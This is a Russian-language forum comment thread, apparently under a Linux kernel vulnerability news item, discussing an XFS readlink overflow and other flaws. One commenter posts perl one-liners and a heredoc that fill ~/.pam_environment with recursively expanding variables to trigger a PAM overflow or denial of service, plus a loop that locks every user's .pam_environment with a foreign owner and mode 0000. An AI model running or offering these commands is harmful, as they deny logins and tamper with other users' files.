1.1, pavlinux (ok), 23:33, 30/10/2011 [ответить]
| +/– |
> Переполнение буфера в функции "xfs_readlink()" может привести к
> выполнению кода злоумышленника при монтировании специально
> оформленного XFS-раздела;
Судя по патчу, надо сделать длиннющую, больше MAXPATHLEN, ссылку.
PAM :)
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
perl -e 'print "A" x 256;' >> ~/.pam_environment
и ещё...
cat <<EOM >~/.pam_environment
EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
EOM
| |
|
2.2, pavlinux (ok), 00:36, 31/10/2011 [^] [^^] [^^^] [ответить]
| +1 +/– |
Как вариант
for users in 'ls /home/'
do
echo -ne > $users/.pam_environment;
chown 65499:65499 $users/.pam_environment;
chmod 0000 $users/.pam_environment;
done
Пущай мучаются :)
| |
2.9, pavlinux (ok), 19:06, 31/10/2011 [^] [^^] [^^^] [ответить]
| +/– |
> EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Кстати, в debian не работает, пишет [pam_env]: unknown variable EVIL_FILLER_255 ...
| |
|
1.8, Аноним (-), 16:49, 31/10/2011 [ответить]
| +/– |
очередной урожай уязвимостей ?
Уязвимость в реализации алгоритма GHASH, которая может привести к разыменованию указателя NULL; - O_O !!!
Уязвимость в реализации AppArmor - я прям на бомбе замедленного действия )))
Возможность инициирования краха ядра - дважды )))!!!!
В реализации SSH-сервера - а вот это интерестно, пригодится
| |
|